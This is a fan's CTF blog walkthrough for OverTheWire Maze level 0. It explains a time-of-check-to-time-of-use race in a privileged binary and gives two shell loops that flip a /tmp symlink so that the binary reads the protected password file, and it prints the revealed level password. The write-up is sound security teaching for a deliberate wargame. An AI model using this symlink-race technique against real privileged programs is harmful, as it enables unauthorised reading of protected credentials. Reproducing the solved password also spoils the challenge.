Part time CTF Player learn every day!!
🌠 I Love Hoshimachi Suisei!! 🌠
🌠 I Love Hoshimachi Suisei!! 🌠

OverTheWire Maze Level 0 tutorial!!

overthewire maze walkthrough ctf binary race-condition symlink

Published on 17 Sep 2023

ssh maze0@maze.labs.overthewire.org -p 2225
# password: maze0

Once logged in, you will find the binary /maze/maze0 and need to exploit it.

Task

The program maze0 checks for a specific file under /tmp and prints its contents if accessible. Decompiled pseudocode (simplified):

int main() {
  char buf[20];
  memset(buf, 0, 20);

  if (access("/tmp/128ecf542a35ac5270a87dc740918404", 4) == 0) {
    int fd = open("/tmp/128ecf542a35ac5270a87dc740918404", 0);
    if (fd < 0) exit(-1);
    read(fd, buf, 19);
    write(1, buf, 19);
  }
  return 0;
}

So the program:

Checks if /tmp/128ecf542a35ac5270a87dc740918404 exists and is readable.
Opens it and prints its contents.

We want it to read /etc/maze_pass/maze1, but maze0 itself has higher privileges than us.

A little bit of Theory

This is a TOCTOU (Time-Of-Check-To-Time-Of-Use) vulnerability, a classic race condition.

First the program checks (access()) if the file is readable.
Then it opens the same path.
If we swap the file between those two steps, we can trick it.

Key idea:

When access() runs, let the symlink point to something we can read.
Immediately after, flip the symlink to /etc/maze_pass/maze1.
If timed correctly, the open() will read the real password file.

Solution

We’ll use two loops in parallel:

Script 1: spam the vulnerable binary

while true; do
    /maze/maze0
done

Script 2: flip the symlink rapidly

while true; do
    ln -sf /etc/maze_pass/maze0 /tmp/128ecf542a35ac5270a87dc740918404
    ln -sf /etc/maze_pass/maze1 /tmp/128ecf542a35ac5270a87dc740918404
done

Explanation:

ln -sf creates a symbolic link (overwrite if exists).
We alternate between a file we can read (maze0) and the target password file (maze1).
Running both scripts together will eventually hit the right timing.

After a few tries, the program will print the contents of /etc/maze_pass/maze1.

Password obtained:

hashaachon

Troubleshooting

If nothing prints: make sure both loops are running in separate terminals.
If /tmp/... path disappears: just recreate it with ln -sf.
Race conditions are probabilistic — patience is part of the exploit 😉.

Congrats 🎉 You now have the password for maze1 and can move to the next level.

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨

Cinema

OverTheWire Maze Level 0 tutorial!!

Login

Task

A little bit of Theory

Solution

Troubleshooting

Thanks for reading!

related posts

Feature Test Post

Service Clients & Automation for Wargames: Protocol RE, Robust Solvers, and FormulaOne + Maze Tie-ins

Protections & Bypass 101: NX/ASLR, Canaries, RELRO/PIE, and Practical Exploit Strategies (Behemoth + Utumno + Maze)

all tags